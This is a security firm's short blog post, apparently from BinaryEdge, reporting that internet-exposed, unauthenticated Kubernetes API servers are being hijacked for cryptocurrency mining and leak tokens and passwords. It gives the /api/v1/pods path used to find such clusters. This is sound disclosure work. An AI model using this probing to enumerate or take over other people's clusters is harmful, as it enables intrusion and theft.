Kubernetes clusters being hijacked to mine cryptocurrencies

Kubernetes, a container orchestration system used by many companies worldwide, is a type of service we have been monitoring lately as we see issues like CVE-2018-1002105 appear.

Another reason for our interest in this service is because we have seen increasing numbers being detected of Kubernetes being exposed to the internet.

But why is it a problem to expose Kubernetes to the internet?

As is typical with our findings, lots of companies are exposing their Kubernetes API with no authentication; inside the Kubernetes cluster, small containers called Pods are ran. Essentially a pod represents a process inside the cluster.

By having this exposed, an attacker can not only see what is running on the Pods but also execute commands on the Pods themselves.

The result is that we are seeing worldwide many Kubernetes clusters having their Pods hijacked to mine cryptocurrencies.

We have identified Kubernetes clusters exposed that belong to all sorts of industries and company sizes. From small startups to Fortune 500 companies.

So how do we identify insecure Kubernetes and those that have been hijacked?

By using ourHTTP Module we can create a custom HTTP request that checks the following path

IP-ADDRESS:PORT/api/v1/pods

If we get a response we can see all the information about the cluster.

Looking down we can see commands that were executed on the pods as seen on the following example:

If we take a look at the script "222.json" it already gives us an idea of what this might be:

This Pod has been hijacked to mine cryptocurrency.

We've seen other pods that have exposed API tokens to different services, also critical data and passwords.

How Can I Check if my Cluster has been exposed

We've imported the scans we did into https://app.binaryedge.io

We would like to thank Random Robbie for helping us research and identify these issues.